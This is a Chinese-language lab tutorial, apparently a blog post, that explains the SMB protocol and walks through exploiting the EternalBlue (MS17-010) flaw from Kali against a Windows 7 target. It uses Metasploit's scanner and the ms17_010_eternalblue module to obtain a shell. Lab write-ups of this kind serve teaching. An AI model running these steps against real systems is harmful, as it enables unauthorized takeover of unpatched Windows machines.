目录
一、原理
二、实验环境
三、实验步骤
\1. 查询ip
\2. 测试两台主机的连通性
\3. 查询指kali数据库的状态
\4. 此时就可以进行永恒之蓝漏洞扫描,(永恒之蓝利用的是ms17_010漏洞,因此到这一步之后的任务就是在kali 里寻找ms17_010漏洞,并且利用该漏洞进行攻击,获得windows 7 的管理员权限)
\5. 启动msf:msfconsole
\6. 搜索ms17_010:search ms17_010
.\7.用use auxiliary/scanner/smb/smb_ms17_010检测一下漏洞
.\8.测试漏洞是否存在
.\9.进行攻击:use exploit/windows/smb/ms17_010_eternalblue
.\10.获取shell,永恒之蓝成功覆盖。
一、原理
Q:什么是永恒之蓝?
A:一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
SMB协议(Server Message Block)------一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
Q:SMB的工作原理?
A: (1):客户端发送一个SMB negport 请求数据报,列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,(发送SessetupX请求数据包来实现)。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
二、实验环境
Kali:主机 、 win 7 :靶机
三、实验步骤
\1. 查询ip
\2. 测试两台主机的连通性
\3. 查询指kali数据库的状态
Payload:service postgresql status
\4. 此时就可以进行永恒之蓝漏洞扫描,(永恒之蓝利用的是ms17_010漏洞,因此到这一步之后的任务就是在kali 里寻找ms17_010漏洞,并且利用该漏洞进行攻击,获得windows 7 的管理员权限)
\5. 启动msf:msfconsole
msfconsole是一个强大的接口程序。Msfconsole提供一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。
\6. 搜索ms17_010:search ms17_010
.\7.用use auxiliary/scanner/smb/smb_ms17_010检测一下漏洞
Show options ------查看帮助
.\8.测试漏洞是否存在
Payload:set rhosts 192.168.32.141
Run ---攻击
.\9.进行攻击:use exploit/windows/smb/ms17_010_eternalblue
.\10.获取shell,永恒之蓝成功覆盖。
